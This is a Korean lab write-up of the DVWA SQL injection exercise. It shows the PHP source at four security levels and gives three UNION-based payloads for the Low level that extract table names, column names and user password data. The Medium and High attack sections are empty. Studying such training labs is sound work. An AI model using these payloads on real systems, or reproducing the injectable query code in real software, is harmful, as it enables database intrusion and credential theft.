DVWA 실험 보고서: 7. SQL 주입 SQL Injection

17168 단어 #dvwa칼럼
2020 - 05 - 17
SQL 주입 SQL Injection
  • 1. 안전 등급: Low
  • 1.1, 소스 코드
  • 1.2, 공격
  • 2. 안전 등급: Medium
  • 2.1 소스 코드
  • 2.2, 공격
  • 3. 안전 등급: High
  • 3.1 소스 코드
  • 3.2, 공격
  • 4. 안전 등급: Impossible
  • 4.1, 소스 코드
  • 4.2, 공격
  • 5. 즐 기세 요!

  • 1. 안전 등급: Low
    1.1 소스 코드
    
    
    if( isset( $_REQUEST[ 'Submit' ] ) ) {
        // Get input
        $id = $_REQUEST[ 'id' ];
    
        // Check database
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '
    '
    . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
    // Get values
    $first = $row["first_name"];
    $last = $row["last_name"];
    // Feedback for end user
    echo "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    ";
    }
    mysqli_close($GLOBALS["___mysqli_ston"]);
    }
    ?>
    1.2 공격
  • 데이터베이스 에 있 는 표 가 져 오기 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
  • 표 의 필드 이름 가 져 오기 1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#
  • 필드 의 데이터 획득 1' union select user,password from users#
  • 2. 안전 등급: Medium
    2.1 소스 코드
    
    
    if( isset( $_POST[ 'Submit' ] ) ) {
        // Get input
        $id = $_POST[ 'id' ];
    
        $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '
    '
    . mysqli_error($GLOBALS["___mysqli_ston"]) . '' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
    // Display values
    $first = $row["first_name"];
    $last = $row["last_name"];
    // Feedback for end user
    echo "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    ";
    }
    }
    // This is used later on in the index.php page
    // Setting it here so we can close the database connection in here like in the rest of the source scripts
    $query = "SELECT COUNT(*) FROM users;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '
    '
    . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
    $number_of_rows = mysqli_fetch_row( $result )[0];
    mysqli_close($GLOBALS["___mysqli_ston"]);
    ?>
    2.2 공격
    레 퍼 런 스
    3. 안전 등급: High
    3.1 소스 코드
    
    
    if( isset( $_SESSION [ 'id' ] ) ) {
        // Get input
        $id = $_SESSION[ 'id' ];
    
        // Check database
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '
    Something went wrong.
    ' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
    // Get values
    $first = $row["first_name"];
    $last = $row["last_name"];
    // Feedback for end user
    echo "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    ";
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
    }
    ?>
    3.2 공격
    레 퍼 런 스
    4. 안전 등급: Impossible
    4.1 소스 코드
    
    
    if( isset( $_GET[ 'Submit' ] ) ) {
        // Check Anti-CSRF token
        checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    
        // Get input
        $id = $_GET[ 'id' ];
    
        // Was a number entered?
        if(is_numeric( $id )) {
            // Check the database
            $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
            $data->bindParam( ':id', $id, PDO::PARAM_INT );
            $data->execute();
            $row = $data->fetch();
    
            // Make sure only 1 result is returned
            if( $data->rowCount() == 1 ) {
                // Get values
                $first = $row[ 'first_name' ];
                $last  = $row[ 'last_name' ];
    
                // Feedback for end user
                echo "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    ";
    }
    }
    }
    // Generate Anti-CSRF token
    generateSessionToken();
    ?>
    4.2 공격
    PDO 기술 을 사용 하여 SQL 주입 을 차단 하 였 습 니 다.
    5. 즐 기세 요!

    좋은 웹페이지 즐겨찾기